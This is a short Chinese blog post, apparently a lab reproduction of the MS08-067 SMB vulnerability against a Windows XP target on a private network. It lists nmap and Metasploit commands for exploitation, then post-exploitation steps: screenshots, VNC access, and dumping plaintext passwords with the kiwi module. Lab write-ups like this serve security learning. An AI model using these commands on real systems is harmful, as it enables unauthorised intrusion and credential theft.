ms08-067漏洞复现

发表于2022-03-24|更新于2023-06-09

|字数总计:176|阅读时长:1分钟|阅读量:

一、实验环境

1
2
3

攻击机(kali)：192.168.189.142

靶机(windows xp): 192.168.189.147

二、漏洞发现

1、使用nmap扫描靶机发现存在ms08-067漏洞

1	nmap --script smb-vuln* 192.168.189.147

三、漏洞利用

1、kali中开启msfconsole,搜索ms08-067

1 2	search ms08-067 use exploit/windows/smb/ms08_067_netapi

1	show options

2、指定目标靶机地址

1	set rhosts 192.168.189.147

3、选择攻击模块

1	show targets

1	set target 34

再次查看我们的配置

4、开始攻击，成功获得system权限

5、得目标系统的屏幕截图

1	screenshot

6、远程桌面

run vnc

7、获取密码，登录远程桌面

1	load kiwi 加载kiwi模块

1	creds_all 列举系统中的明文密码

8、登录远程桌面

文章作者: xia0chen

文章链接: http://www.chiza.top/2022/03/24/ms08-067%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 xia0chen's blog！